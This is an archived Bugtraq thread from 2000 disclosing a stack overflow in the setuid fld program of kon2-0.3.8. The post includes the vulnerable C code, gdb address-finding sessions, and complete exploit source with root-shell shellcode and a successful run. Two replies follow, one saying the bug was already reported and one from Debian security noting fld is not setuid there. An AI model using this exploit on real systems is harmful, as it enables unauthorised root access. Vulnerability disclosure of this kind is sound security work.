5330770 2000-08-04  20:46  /299 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12061>
Ärende: kon2
------------------------------------------------------------
From: Elias Levy <aleph1@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000804095642.G5625@securityfocus.com>

----- Forwarded message from Black Sphere <bsphere@usa.net> -----

Message-ID: <000801bffc78$b8ab4390$0100a8c0@sphere>
From: "Black Sphere" <bsphere@usa.net>
To: <aleph1@securityfocus.com>
Subject: Bugtraq List
Date: Wed, 2 Aug 2000 12:56:39 +0100
X-Mailer: Microsoft Outlook Express 5.00.2919.6700

I´ve send this e-mail to  LISTSERV@securityfocus.com, but i haven´t
seen it in the mailing list, so i send it to you.

--------------------------------------------------------------------------------------------------------------------------------------------

Info :

  Package : kon2-0.3.8 Compromise : root Vulnerable Sistems : All
  linux sistems that have this package installed.  Author : E-Ligth
  (Hugo Oliveira Dias) - mail : bsphere@clix.pt

 Discussion :

   There is a vulnerable suid program, called FLD that is part of the kon2-0.3.8
  package. This program accepts options input from a text file and its possible
  to input arbitrary code into the stack and spawning a root shell.

 Exploit:

  This is the vulnerable part of the program :

-------------------------------------- bdf.c  -------------------------------------------------

       while (fgets (line, 256, fp))
       {
        if (!width && !high &&
          !strncmp ("FONTBOUNDINGBOX", line, strlen ("FONTBOUNDINGBOX")))
        {
          p = line + sizeof ("FONTBOUNDINGBOX");
          sscanf (p, "%d %d", &width, &high);
        }
        else if (!strncmp ("CHARSET_REGISTRY", line, 16))
        {
          p = line + sizeof ("CHARSET_REGISTRY");
          while (*p != '"')
            p++;
          w = ++p;
          while (*p != '"')
            p++;
          *p = '\0';
          strcpy (reg, w);
        }

-------------------------------------- bdf.c  -------------------------------------------------

         As we can see , it reads 256 bytes from the file. If our
         options file looks like this :

-------------------------------------- options  -------------------------------------------------
  CHARSET_REGISTRY
 CHARSET_REGISTRY "0000000000000000000000
 CHARSET_REGISTRY "ISO8859"
 CHARSET_ENCODING "1"
-------------------------------------- options  -------------------------------------------------

  The program will do p++ while it *p != '"' If we write a exploit
  program that writes to an environment variable the code and
  adresses we need between quotes, its possibele to put the value of
  the environment variable in variable reg with strcpy.

  When we define a environment variable, the whole environment,
  including our variable, will be at the end of the stack.So if we
  don´t put quotes in the options file, variable w will point to our
  code.If we find quotes somewhere in the memory, before our code
  appears, we just add : CHARSET_REGISTRY lines, until all the quotes
  that are before our code in the stack becames : '\0' (When *p =
  '\"' for second time, it will convert '\"' to '\0').

  The size of the buffer must be 541 :
  Stack looks like this

    256     256      4      4      4     4
  [ reg ] [ line ] [ fsp ] [ ret ] [ fp ] [...] ............[EGG = \"...our code ...\"]...

  We cannot destroy the adresses after ret with the '\0' char of
  strcpy(), so we must use GDB and a version of FLD compiled with the
  -ggdb option and get two or three values after [ret] that cannot be
  destroyed and must be replaced.

  For this we do :

  [sphere@fire font]# gdb fld

   GNU gdb 19991116
   Copyright 1998 Free Software Foundation, Inc.
   GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
   Type "show copying" to see the conditions.
   There is absolutely no warranty for GDB.  Type "show warranty" for details.
   This GDB was configured as "i586-mandrake-linux"...
   (gdb) set args -type bdf ./cod
   (gdb) break FontLoadBdf
   Breakpoint 1 at 0x8049a14: file bdf.c, line 31.
   (gdb) r
   Starting program: /usr/src/RPM/SOURCES/kon2-0.3.8/font/fld -type bdf ./options

   Breakpoint 1, FontLoadBdf (fp=0x804c590) at bdf.c:31
   31        fi.type = CodingByRegistry ("ISO8859-1");

   (gdb) x/6aw $ebp
   0xbffff8fc:     0xbffffa3c      0x8049326 <main+694>    0x804c590       0xbffffbef
   0xbffff90c:     0x40013460      0x0
    (gdb)
   (gdb) print reg + 20
    $1 = 0xbffff710 "`4\001@÷\003"
    (gdb) c
    Continuing.

     Program received signal SIGSEGV, Segmentation fault.
    0x8049af1 in FontLoadBdf (fp=0x804c590) at bdf.c:49
    49                  p++;
    (gdb)


  We change xp.c program with the rigth adresses.  All equal to that
  except "0x8049326 <main+694>" that will become "0xbffff710"

  Then we copy /usr/bin/fld to our home directory and use gdb tomake
  a break at fgets() This will give us the value next to [ret].

  [sphere@fire font]# gdb fld GNU gdb 19991116 Copyright 1998 Free
  Software Foundation, Inc.  GDB is free software, covered by the GNU
  General Public License, and you are welcome to change it and/or
  distribute copies of it under certain conditions.  Type "show
  copying" to see the conditions.  There is absolutely no warranty
  for GDB.  Type "show warranty" for details.  This GDB was
  configured as "i586-mandrake-linux"...(no debugging symbols
  found)...  (gdb) break fgets Breakpoint 1 at 0x8048a5c (gdb) set
  args -type bdf ./cod (gdb) r Starting program:
  /usr/src/RPM/SOURCES/kon2-0.3.8/font/fld -type bdf ./cod

  Breakpoint 1, 0x40064ad5 in _IO_fgets (buf=0xbffff7fc "Ð6\001\002\001", n=256,    fp=0x804bf90) at iofgets.c:34
  34      iofgets.c: No such file or directory.

  Now we have the rigth "fp" address

  We change xp.c addresses again.

-------------------------------------- xp.c ----------------------------------------------------
/* Exploit code for /usr/bin/fld

   Compile with : gcc -o xp xp.c

   Made by : E-Ligth (Hugo Oliveira Dias) 01/08/2000
*/


 #include <string.h>
 #include <stdlib.h>
 #include <stdio.h>

 #define OFFSET 0
 #define BUFFSIZE 541
 #define NOP 0x90

 char shellcode[] =
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/zh";

 unsigned long get_esp(void) {
    __asm__("movl %esp,%eax");
 }

 int main(int argc,char *argv[])
 {
   int bsize = BUFFSIZE;
   int offset = OFFSET;
  int i;
   long *addr_ptr, addr;
   char *ptr,*buf,*env;
   char arg[30];

  if (!(buf = malloc(bsize))) {
      printf("Can't allocate memory.\n");
      exit(0);
   }


  ptr = buf;
  for (i = 0; i < bsize; i++)

     *(ptr++) = shellcode[i];

  buf[519] = 0x3c; /* Saved EBP 0xbffffa3c */
  buf[520] = 0xfa;
  buf[521] = 0xff;
  buf[522] = 0xbf;

  buf[523] = 0x10; /* Return Address  0xbffff710 */
  buf[524] = 0xf7;
  buf[525] = 0xff;
  buf[526] = 0xbf;

  buf[527] = 0x90; /* fp variable 0x804bf90 */
  buf[528] = 0xbf;
  buf[529] = 0x04;
  buf[530] = 0x08;

  buf[531] = 0xef; /* variable thats shouldn´t be destroyed 0xbffffbef */
  buf[532] = 0xfb;
  buf[533] = 0xff;
  buf[534] = 0xbf;

  buf[535] = 0x60; /* variable thats shouldn´t be destroyed 0x40013460 */
  buf[536] = 0x34;
  buf[537] = 0x01;
  buf[538] = 0x40;

  memcpy(buf,"-type \"",7);
  buf[540] = '\0';
  buf[539] = '\"';

  memcpy(arg,"-type bdf ./code",16);
  arg[16] = '\0';

  env = (char *) malloc(bsize + 10);
  memcpy(env,"EGG=",4);

  strcat(env,buf);

  putenv(env);

  system("/bin/bash");

   exit(0);
-------------------------------------- xp.c ----------------------------------------------------

  Now all we have to do is :

  [sphere@fire my]$ gcc -o xp xp.c
 [sphere@fire font]$ ./xp
 [sphere@fire font]$ fld -type bdf ./options
 dircolors: no SHELL environment variable, and no shell type option given
 /etc/profile.d/color_ls.sh:3: parse error: condition expected: =
 sphere@fire ~/my $ whoami
 root
 sphere@fire ~/my $


 This code uses zsh with the name of zh to spawn the shell.  The
 exploit code was developed to participate in Wargames of
 www.hack3r.com.  The target computer was the host
 hercules.hacker.org running Turbo Linux 6.0.4 and my distribution is
 Linux Mandrake 7.0.Both revealed to be vulnerable to this exploit. I
 think Debian also as this package but i don´t try this exploit in it.

 Solving :

  I didn't work on the patch because i´ve no time, but i advise
  people to remove suid from that program until a patch is available.



 I didn't know where to report the bug first, because is the first
 time i find a suid exploitable program, so i send it to you
 www.securityfocus.com and so the problem can be solved.


 Thanks for your attention,

 E-Ligth (Hugo Oliveira Dias)

 Email : bsphere@clix.pt



 -----BEGIN PGP SIGNATURE-----
 Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

 iQA/AwUAOYYsk8IMfhGvrGFNEQLsxACggUulavLEue099ivMmV+kCIZGyI4AnRP9
 xQKBluwLd4xFOUMC35Cmd/Jw
 =85FF
 -----END PGP SIGNATURE-----


----- End forwarded message -----

--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
(5330770) ------------------------------------------(Ombruten)
Kommentar i text 5336289 av Brevbäraren (som är implementerad i) Python
Kommentar i text 5336582 av Brevbäraren (som är implementerad i) Python
Läsa nästa kommentar.
5336289 2000-08-07  08:50  /34 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12068>
Kommentar till text 5330770 av Brevbäraren (som är implementerad i) Python
Ärende: Re: kon2
------------------------------------------------------------
From: Chris Evans <chris@FERRET.LMH.OX.AC.UK>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.21.0008042128450.4307-100000@ferret.lmh.ox.ac.uk>

On Fri, 4 Aug 2000, Elias Levy wrote:

> ----- Forwarded message from Black Sphere <bsphere@usa.net> -----
>
> Info :
>
>   Package : kon2-0.3.8
>   Compromise : root

[...]

>
>         else if (!strncmp ("CHARSET_REGISTRY", line, 16))

[...]

Old news. Same vulnerability is noted (along with others) in my Jun
19th post.

There has, of course, been a slew of kon2 package updates recently. I
wonder if vendors/maintainers simply patched the single bugs in
question, or took active measures to hunt down others?

I'd love it to be demonstrated otherwise, but I bet these bugs did not
spur a proper audit, and more root compromises remain.

Cheers
Chris
(5336289) ------------------------------------------(Ombruten)
Läsa nästa kommentar.
5336582 2000-08-07  10:33  /45 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12082>
Kommentar till text 5330770 av Brevbäraren (som är implementerad i) Python
Ärende: Re: kon2
------------------------------------------------------------
From: Martin Schulze <joey@FINLANDIA.INFODROM.NORTH.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000807002637.A21659@finlandia.infodrom.north.de>

Elias Levy wrote:
>   Package : kon2-0.3.8
>   Compromise : root
>   Vulnerable Sistems : All linux sistems that have this package installed.
>   Author : E-Ligth (Hugo Oliveira Dias) - mail : bsphere@clix.pt
>
>  Discussion :
>
>    There is a vulnerable suid program, called FLD that is part of the kon2-0.3.8
>   package. This program accepts options input from a text file and its possible
>   to input arbitrary code into the stack and spawning a root shell.

>  This code uses zsh with the name of zh to spawn the shell.
>  The exploit code was developed to participate in Wargames of www.hack3r.com.
>  The target computer was the host hercules.hacker.org running Turbo Linux 6.0.4
>  and my distribution is Linux Mandrake 7.0.Both revealed to be vulnerable to this
>  exploit. I think Debian also as this package but i don´t try this exploit in it.

Yes, Debian distributes kon2 packages:

Debian GNU/Linux 2.1    0.3.7-9
Debian GNU/Linux 2.2    0.3.9b-3

The Debian maintainer for kon2 has decided not to make /usr/bin/fld
setuid, so the exploit doesn seem to work there.

>  I didn't know where to report the bug first, because is the first time i find
>  a suid exploitable program, so i send it to you www.securityfocus.com and so
>  the problem can be solved.

Thanks.

Regards,

	Joey
	Debian Security Team

--
Unix is user friendly ...  It's just picky about its friends.
(5336582) ------------------------------------------